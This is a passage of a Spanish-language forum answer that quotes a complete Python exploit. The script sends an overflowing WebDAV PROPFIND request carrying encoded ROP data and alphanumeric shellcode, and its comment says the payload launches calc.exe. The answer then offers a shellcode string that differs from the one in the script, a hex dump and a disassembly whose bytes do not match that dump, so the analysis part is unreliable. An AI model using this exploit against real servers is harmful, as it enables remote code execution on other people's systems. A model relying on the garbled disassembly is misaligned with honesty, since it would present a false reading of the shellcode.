Encontré este documento aquí .
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: [email protected]
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
Coincide con el inicio de su carga útil, que es:
http://localhost/aaaaaaa潨硣...
Texto chino a hexadecimal:
e6 bd a8 e7 a1 a3
Supongo que usaron esto para iniciar calc.exe.
Tal vez puedas empezar desde aquí.
EDIT:
Aunque no tengo una respuesta definitiva para ti, quizás pueda ser un poco más útil.
Tu código de shell parece ser:
VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLIX1yYpYpipS0ayhe01IBc4dKNrlptKoblL2k1BZtBk3BkxzoFWPJNFLqyomaI0FLml0acLLBLlMPgQHOZmIqWWHbZPObr7dKqBjpdK12MlM1Z0bkOPT8Qu5p0tnj9qz0pPRkNhmHRkOhKpKQVsHcmlMyDKnTRkM1Z601ioMaepvLva8OlMzaY7nXYP1eYdkSSMXxMksMKtT5ZBR8Rkr8Ktyq9Cc64KzlpKTK28mLiqJ3rkM42km1hP3Yq4ldO4QK1KPab9qJr1ioIPNxqOaJRkLRxkTFQMS8RNC5qdm0c81gpiPnPisYK6OdphPLbWlfzgKOj5P1IoaG0Wb7R7PVrHLzNvt9FGYoz5zK30okp1WYPQNqBJYs0QOaQZNpb3NpbHaGSYEOevKOwehkpOb9P1Z21BrH9pP2c0BdNrnraBoaNrb0BHxkr5nNmk9oZ53YwVpjJpQKqX3Pp39pIpBiWp0jJdb02JMO1FOxsENfeNavYoweLqYonwB7aGNwqFQXNMkVMHQkiovuauI045kvpKjoe4Rcm0m0ipJKvqiYETkPipKPk84lyoKOIoLoPibMOqs7C53CnO31qR1SLo14pLnNRP1Xppm0ZKPkNQWPoopPqZyrpjIrb0QZm22Jm227Ox8ZyfWj0Oyovu4S01gPqVh8Jdm3o9gTr44MpLKtlHp1Y0fTM3r0B1b638zrF6dIzBIoGequY0D4nMaHReepD4kf1ZipPT20dMq4LdjlpPb3QXNM1GtnokYofu2cZLlDxkhNOcphVfbvcWQBYoZ5ozYpR72HP1dK2ORgyoj5PjIps8hp85DbaFIo6uJHrp9oIokONcoJNONOr2rERCPyos2L35qbLoloPsT6s3382Opsptlns5qhPeypyXibKNIoYoMa01LqLnOBOCp0lnmbLrp9lnP2nRlvKPAA
Esto se traduce a esto en hexadecimal:
{ 0x56, 0x56, 0x59, 0x41, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x51, 0x41, 0x54, 0x41, 0x58, 0x41, 0x5A, 0x41, 0x50, 0x41, 0x33, 0x51, 0x41, 0x44, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x52, 0x41, 0x4C, 0x41, 0x59, 0x41, 0x49, 0x41, 0x51, 0x41, 0x49, 0x41, 0x51, 0x41, 0x50, 0x41, 0x35, 0x41, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x31, 0x41, 0x49, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x4A, 0x31, 0x31, 0x41, 0x49, 0x41, 0x49, 0x41, 0x58, 0x41, 0x35, 0x38, 0x41, 0x41, 0x50, 0x41, 0x5A, 0x41, 0x42, 0x41, 0x42, 0x51, 0x49, 0x31, 0x41, 0x49, 0x51, 0x49, 0x41, 0x49, 0x51, 0x49, 0x31, 0x31, 0x31, 0x31, 0x41, 0x49, 0x41, 0x4A, 0x51, 0x49, 0x31, 0x41, 0x59, 0x41, 0x5A, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x41, 0x42, 0x33, 0x30, 0x41, 0x50, 0x42, 0x39, 0x34, 0x34, 0x4A, 0x42, 0x36, 0x58, 0x36, 0x57, 0x4D, 0x56, 0x37, 0x4F, 0x37, 0x5A, 0x38, 0x5A, 0x38, 0x59, 0x38, 0x59, 0x32, 0x54, 0x4D, 0x54, 0x4A, 0x54, 0x31, 0x4D, 0x30, 0x31, 0x37, 0x59, 0x36, 0x51, 0x30, 0x31, 0x30, 0x31, 0x30, 0x45, 0x4C, 0x53, 0x4B, 0x53, 0x30, 0x45, 0x4C, 0x53, 0x33, 0x53, 0x4A, 0x4D, 0x30, 0x4B, 0x37, 0x54, 0x30, 0x4A, 0x30, 0x36, 0x31, 0x4B, 0x34, 0x4B, 0x36, 0x55, 0x37, 0x57, 0x35, 0x4B, 0x4A, 0x4C, 0x4F, 0x4C, 0x4D, 0x52, 0x35, 0x5A, 0x4E, 0x4C, 0x30, 0x5A, 0x4D, 0x56, 0x35, 0x4C, 0x35, 0x4C, 0x4D, 0x58, 0x31, 0x5A, 0x4C, 0x50, 0x30, 0x56, 0x33, 0x4C, 0x35, 0x4F, 0x35, 0x53, 0x4C, 0x5A, 0x35, 0x59, 0x34, 0x50, 0x4B, 0x54, 0x34, 0x50, 0x34, 0x4F, 0x35, 0x4F, 0x34, 0x55, 0x33, 0x59, 0x4A, 0x4C, 0x37, 0x4E, 0x4C, 0x55, 0x38, 0x50, 0x4D, 0x50, 0x31, 0x51, 0x4D, 0x54, 0x4D, 0x4B, 0x30, 0x35, 0x31, 0x50, 0x31, 0x51, 0x30, 0x46, 0x36, 0x54, 0x30, 0x30, 0x4E, 0x5A, 0x4C, 0x4C, 0x32, 0x4B, 0x35, 0x55, 0x30, 0x4F, 0x30, 0x58, 0x36, 0x50, 0x30, 0x4E, 0x4B, 0x53, 0x30, 0x4C, 0x36, 0x50, 0x36, 0x53, 0x38, 0x53, 0x32, 0x4F, 0x34, 0x51, 0x31, 0x55, 0x31, 0x58, 0x30, 0x36, 0x30, 0x31, 0x33, 0x57, 0x37, 0x4D, 0x30, 0x42, 0x32, 0x58, 0x35, 0x4F, 0x35, 0x52, 0x32, 0x4F, 0x30, 0x32, 0x4C, 0x54, 0x4C, 0x50, 0x4D, 0x4B, 0x37, 0x55, 0x4B, 0x4C, 0x31, 0x59, 0x39, 0x54, 0x31, 0x5A, 0x37, 0x51, 0x30, 0x46, 0x4C, 0x57, 0x32, 0x52, 0x4B, 0x55, 0x31, 0x50, 0x37, 0x58, 0x4B, 0x51, 0x33, 0x4F, 0x34, 0x53, 0x32, 0x55, 0x4C, 0x52, 0x30, 0x44, 0x4A, 0x4E, 0x35, 0x51, 0x34, 0x57, 0x31, 0x4F, 0x30, 0x48, 0x4D, 0x51, 0x4C, 0x4F, 0x33, 0x54, 0x31, 0x59, 0x39, 0x56, 0x38, 0x56, 0x30, 0x4F, 0x31, 0x55, 0x30, 0x43, 0x35, 0x4C, 0x4B, 0x58, 0x31, 0x59, 0x30, 0x52, 0x32, 0x51, 0x4D, 0x53, 0x34, 0x55, 0x39, 0x4F, 0x32, 0x54, 0x39, 0x54, 0x4D, 0x4C, 0x35, 0x4B, 0x30, 0x52, 0x4D, 0x50, 0x30, 0x45, 0x33, 0x4F, 0x4A, 0x5A, 0x32, 0x51, 0x4D, 0x53, 0x4E, 0x4E, 0x4B, 0x53, 0x31, 0x51, 0x34, 0x4C, 0x34, 0x4F, 0x35, 0x51, 0x39, 0x59, 0x4D, 0x50, 0x39, 0x4B, 0x39, 0x4B, 0x36, 0x53, 0x4E, 0x4E, 0x4C, 0x5A, 0x31, 0x59, 0x38, 0x4E, 0x4D, 0x4C, 0x4D, 0x4C, 0x32, 0x51, 0x38, 0x51, 0x30, 0x30, 0x32, 0x55, 0x31, 0x30, 0x30, 0x5A, 0x39, 0x4F, 0x4B, 0x52, 0x31, 0x4D, 0x33, 0x59, 0x35, 0x54, 0x4A, 0x4D, 0x37, 0x4F, 0x4C, 0x58, 0x38, 0x50, 0x33, 0x55, 0x4C, 0x59, 0x37, 0x59, 0x30, 0x59, 0x37, 0x58, 0x34, 0x59, 0x4D, 0x57, 0x35, 0x4D, 0x4A, 0x55, 0x4C, 0x59, 0x37, 0x52, 0x31, 0x4D, 0x4B, 0x52, 0x4B, 0x51, 0x35, 0x57, 0x30, 0x58, 0x30, 0x4E, 0x33, 0x55, 0x31, 0x4B, 0x4C, 0x50, 0x39, 0x4F, 0x31, 0x50, 0x31, 0x4C, 0x33, 0x57, 0x39, 0x50, 0x35, 0x50, 0x4F, 0x4F, 0x30, 0x46, 0x32, 0x53, 0x4D, 0x58, 0x4A, 0x4E, 0x4A, 0x4D, 0x4A, 0x53, 0x38, 0x4B, 0x4A, 0x4E, 0x4B, 0x50, 0x41 }
Si desmonta el uso de ndisasm con el indicador -b 32, obtendrá:
00000000 0560560590 add eax,0x90055660
00000005 41 inc ecx
00000006 034034 add eax,[eax+0x34]
00000009 034034 add eax,[eax+0x34]
0000000C 034034 add eax,[eax+0x34]
0000000F 034034 add eax,[eax+0x34]
00000012 034034 add eax,[eax+0x34]
00000015 0510410540 add eax,0x40054110
0000001A 41 inc ecx
0000001B 05804105A0 add eax,0xa0054180
00000020 41 inc ecx
00000021 0500410330 add eax,0x30034100
00000026 51 push ecx
00000027 0410 add al,0x10
00000029 44 inc esp
0000002A 0410 add al,0x10
0000002C 5A pop edx
0000002D 0410 add al,0x10
0000002F 42 inc edx
00000030 0410 add al,0x10
00000032 52 push edx
00000033 0410 add al,0x10
00000035 4C dec esp
00000036 0410 add al,0x10
00000038 59 pop ecx
00000039 0410 add al,0x10
0000003B 49 dec ecx
0000003C 0410 add al,0x10
0000003E 51 push ecx
0000003F 0410 add al,0x10
00000041 49 dec ecx
00000042 0410 add al,0x10
00000044 51 push ecx
00000045 0410 add al,0x10
00000047 50 push eax
00000048 0410 add al,0x10
0000004A 3504104104 xor eax,0x4411004
0000004F 105004 adc [eax+0x4],dl
00000052 105A03 adc [edx+0x3],bl
00000055 104104 adc [ecx+0x4],al
00000058 90 nop
00000059 310410 xor [eax+edx],eax
0000005C 49 dec ecx
0000005D 0410 add al,0x10
0000005F 49 dec ecx
00000060 0410 add al,0x10
00000062 4A dec edx
00000063 0310 add edx,[eax]
00000065 310410 xor [eax+edx],eax
00000068 49 dec ecx
00000069 0410 add al,0x10
0000006B 49 dec ecx
0000006C 0410 add al,0x10
0000006E 58 pop eax
0000006F 0410 add al,0x10
00000071 3503804104 xor eax,0x4418003
00000076 105004 adc [eax+0x4],dl
00000079 105A04 adc [edx+0x4],bl
0000007C 104204 adc [edx+0x4],al
0000007F 104205 adc [edx+0x5],al
00000082 104903 adc [ecx+0x3],cl
00000085 104104 adc [ecx+0x4],al
00000088 90 nop
00000089 51 push ecx
0000008A 0490 add al,0x90
0000008C 41 inc ecx
0000008D 0490 add al,0x90
0000008F 51 push ecx
00000090 0490 add al,0x90
00000092 3103 xor [ebx],eax
00000094 1031 adc [ecx],dh
00000096 0310 add edx,[eax]
00000098 41 inc ecx
00000099 0490 add al,0x90
0000009B 41 inc ecx
0000009C 04A0 add al,0xa0
0000009E 51 push ecx
0000009F 0490 add al,0x90
000000A1 310410 xor [eax+edx],eax
000000A4 59 pop ecx
000000A5 0410 add al,0x10
000000A7 5A pop edx
000000A8 0420 add al,0x20
000000AA 41 inc ecx
000000AB 0420 add al,0x20
000000AD 41 inc ecx
000000AE 0420 add al,0x20
000000B0 41 inc ecx
000000B1 0420 add al,0x20
000000B3 41 inc ecx
000000B4 0420 add al,0x20
000000B6 3303 xor eax,[ebx]
000000B8 004105 add [ecx+0x5],al
000000BB 004203 add [edx+0x3],al
000000BE 90 nop
000000BF 3403 xor al,0x3
000000C1 40 inc eax
000000C2 4A dec edx
000000C3 0420 add al,0x20
000000C5 360580360570 ss add eax,0x70053680
000000CB 4D dec ebp
000000CC 05603704F0 add eax,0xf0043760
000000D1 37 aaa
000000D2 05A03805A0 add eax,0xa00538a0
000000D7 380590380590 cmp [dword 0x90053890],al
000000DD 3205404D0540 xor al,[dword 0x40054d40]
000000E3 4A dec edx
000000E4 05403104D0 add eax,0xd0043140
000000E9 3003 xor [ebx],al
000000EB 1037 adc [edi],dh
000000ED 0590360510 add eax,0x10053690
000000F2 3003 xor [ebx],al
000000F4 1030 adc [eax],dh
000000F6 0310 add edx,[eax]
000000F8 300450 xor [eax+edx*2],al
000000FB 4C dec esp
000000FC 05304B0530 add eax,0x30054b30
00000101 300450 xor [eax+edx*2],al
00000104 4C dec esp
00000105 0530330530 add eax,0x30053330
0000010A 4A dec edx
0000010B 04D0 add al,0xd0
0000010D 3004B0 xor [eax+esi*4],al
00000110 37 aaa
00000111 05403004A0 add eax,0xa0043040
00000116 3003 xor [ebx],al
00000118 60 pusha
00000119 3104B0 xor [eax+esi*4],eax
0000011C 3404 xor al,0x4
0000011E B036 mov al,0x36
00000120 0550370570 add eax,0x70053750
00000125 3504B04A04 xor eax,0x44ab004
0000012A C04F04C0 ror byte [edi+0x4],byte 0xc0
0000012E 4D dec ebp
0000012F 05203505A0 add eax,0xa0053520
00000134 4E dec esi
00000135 04C0 add al,0xc0
00000137 3005A04D0560 xor [dword 0x60054da0],al
0000013D 3504C03504 xor eax,0x435c004
00000142 C04D0580 ror byte [ebp+0x5],byte 0x80
00000146 3105A04C0500 xor [dword 0x54ca0],eax
0000014C 3005603304C0 xor [dword 0xc0043360],al
00000152 3504F03505 xor eax,0x535f004
00000157 304C05A0 xor [ebp+eax-0x60],cl
0000015B 3505903405 xor eax,0x5349005
00000160 004B05 add [ebx+0x5],cl
00000163 40 inc eax
00000164 3405 xor al,0x5
00000166 003404 add [esp+eax],dh
00000169 F03504F03405 lock xor eax,0x534f004
0000016F 50 push eax
00000170 3305904A04C0 xor eax,[dword 0xc0044a90]
00000176 37 aaa
00000177 04E0 add al,0xe0
00000179 4C dec esp
0000017A 0550380500 add eax,0x53850
0000017F 4D dec ebp
00000180 0500310510 add eax,0x10053100
00000185 4D dec ebp
00000186 05404D04B0 add eax,0xb0044d40
0000018B 3003 xor [ebx],al
0000018D 50 push eax
0000018E 310500310510 xor [dword 0x10053100],eax
00000194 300460 xor [eax],al
00000197 360540300300 ss add eax,0x33040
0000019D 4E dec esi
0000019E 05A04C04C0 add eax,0xc0044ca0
000001A3 3204B0 xor al,[eax+esi*4]
000001A6 3505503004 xor eax,0x4305005
000001AB F0300580360500 lock xor [dword 0x53680],al
000001B2 3004E0 xor [eax],al
000001B5 4B dec ebx
000001B6 05303004C0 add eax,0xc0043030
000001BB 360500360530 ss add eax,0x30053600
000001C1 3805303204F0 cmp [dword 0xf0043230],al
000001C7 3405 xor al,0x5
000001C9 1031 adc [ecx],dh
000001CB 0550310580 add eax,0x80053150
000001D0 3003 xor [ebx],al
000001D2 60 pusha
000001D3 3003 xor [ebx],al
000001D5 1033 adc [ebx],dh
000001D7 05703704D0 add eax,0xd0043770
000001DC 300420 xor [eax],al
000001DF 3205803504F0 xor al,[dword 0xf0043580]
000001E5 3505203204 xor eax,0x4322005
000001EA F03003 lock xor [ebx],al
000001ED 204C0540 and [ebp+eax+0x40],cl
000001F1 4C dec esp
000001F2 05004D04B0 add eax,0xb0044d00
000001F7 37 aaa
000001F8 05504B04C0 add eax,0xc0044b50
000001FD 310590390540 xor [dword 0x40053990],eax
00000203 3105A0370510 xor [dword 0x100537a0],eax
00000209 300460 xor [eax],al
0000020C 4C dec esp
0000020D 0570320520 add eax,0x20053270
00000212 4B dec ebx
00000213 0550310500 add eax,0x53150
00000218 37 aaa
00000219 05804B0510 add eax,0x10054b80
0000021E 3304F0 xor eax,[eax+esi*8]
00000221 3405 xor al,0x5
00000223 3032 xor [edx],dh
00000225 05504C0520 add eax,0x20054c50
0000022A 300440 xor [eax+eax*2],al
0000022D 4A dec edx
0000022E 04E0 add al,0xe0
00000230 3505103405 xor eax,0x5341005
00000235 7031 jo 0x268
00000237 04F0 add al,0xf0
00000239 300480 xor [eax+eax*4],al
0000023C 4D dec ebp
0000023D 05104C04F0 add eax,0xf0044c10
00000242 330540310590 xor eax,[dword 0x90053140]
00000248 390560380560 cmp [dword 0x60053860],eax
0000024E 3004F0 xor [eax+esi*8],al
00000251 310550300430 xor [dword 0x30043050],eax
00000257 3504C04B05 xor eax,0x54bc004
0000025C 803105 xor byte [ecx],0x5
0000025F 90 nop
00000260 300520320510 xor [dword 0x10053220],al
00000266 4D dec ebp
00000267 0530340550 add eax,0x50053430
0000026C 3904F0 cmp [eax+esi*8],eax
0000026F 320540390540 xor al,[dword 0x40053940]
00000275 4D dec ebp
00000276 04C0 add al,0xc0
00000278 3504B03005 xor eax,0x530b004
0000027D 204D05 and [ebp+0x5],cl
00000280 0030 add [eax],dh
00000282 0450 add al,0x50
00000284 3304F0 xor eax,[eax+esi*8]
00000287 4A dec edx
00000288 05A0320510 add eax,0x100532a0
0000028D 4D dec ebp
0000028E 05304E04E0 add eax,0xe0044e30
00000293 4B dec ebx
00000294 0530310510 add eax,0x10053130
00000299 3404 xor al,0x4
0000029B C0 db 0xc0
0000029C 3404 xor al,0x4
0000029E F03505103905 lock xor eax,0x5391005
000002A4 90 nop
000002A5 4D dec ebp
000002A6 05003904B0 add eax,0xb0043900
000002AB 3904B0 cmp [eax+esi*4],eax
000002AE 3605304E04E0 ss add eax,0xe0044e30
000002B4 4C dec esp
000002B5 05A0310590 add eax,0x900531a0
000002BA 3804E0 cmp [eax],al
000002BD 4D dec ebp
000002BE 04C0 add al,0xc0
000002C0 4D dec ebp
000002C1 04C0 add al,0xc0
000002C3 320510380510 xor al,[dword 0x10053810]
000002C9 3003 xor [ebx],al
000002CB 0032 add [edx],dh
000002CD 0550310300 add eax,0x33150
000002D2 3005A03904F0 xor [dword 0xf00439a0],al
000002D8 4B dec ebx
000002D9 05203104D0 add eax,0xd0043120
000002DE 330590350540 xor eax,[dword 0x40053590]
000002E4 4A dec edx
000002E5 04D0 add al,0xd0
000002E7 37 aaa
000002E8 04F0 add al,0xf0
000002EA 4C dec esp
000002EB 0580380500 add eax,0x53880
000002F0 3305504C0590 xor eax,[dword 0x90054c50]
000002F6 37 aaa
000002F7 0590300590 add eax,0x90053090
000002FC 37 aaa
000002FD 0580340590 add eax,0x90053480
00000302 4D dec ebp
00000303 05703504D0 add eax,0xd0043570
00000308 4A dec edx
00000309 05504C0590 add eax,0x90054c50
0000030E 37 aaa
0000030F 05203104D0 add eax,0xd0043120
00000314 4B dec ebx
00000315 05204B0510 add eax,0x10054b20
0000031A 3505703005 xor eax,0x5307005
0000031F 803004 xor byte [eax],0x4
00000322 E033 loopne 0x357
00000324 05503104B0 add eax,0xb0043150
00000329 4C dec esp
0000032A 05003904F0 add eax,0xf0043900
0000032F 3105003104C0 xor [dword 0xc0043100],eax
00000335 330570390500 xor eax,[dword 0x53970]
0000033B 3505004F04 xor eax,0x44f0005
00000340 F0300460 lock xor [eax],al
00000344 3205304D0580 xor al,[dword 0x80054d30]
0000034A 4A dec edx
0000034B 04E0 add al,0xe0
0000034D 4A dec edx
0000034E 04D0 add al,0xd0
00000350 4A dec edx
00000351 05303804B0 add eax,0xb0043830
00000356 4A dec edx
00000357 04E0 add al,0xe0
00000359 4B dec ebx
0000035A 05 db 0x05
0000035B 00 db 0x00
0000035C 41 inc ecx
También verifiqué el desmontaje de -b 64, sin embargo, me pareció una tontería. Corrígeme si me equivoco aquí. Tal vez puedas averiguar algo desde aquí?
Para referencia, el código de shell de desbordamiento de búfer calc.exe se puede encontrar aquí:
enlace
También puede buscar en ese sitio web coincidencias parciales del código de shell que tiene.
También aquí , puede verificar los códigos de shell solo.
enlace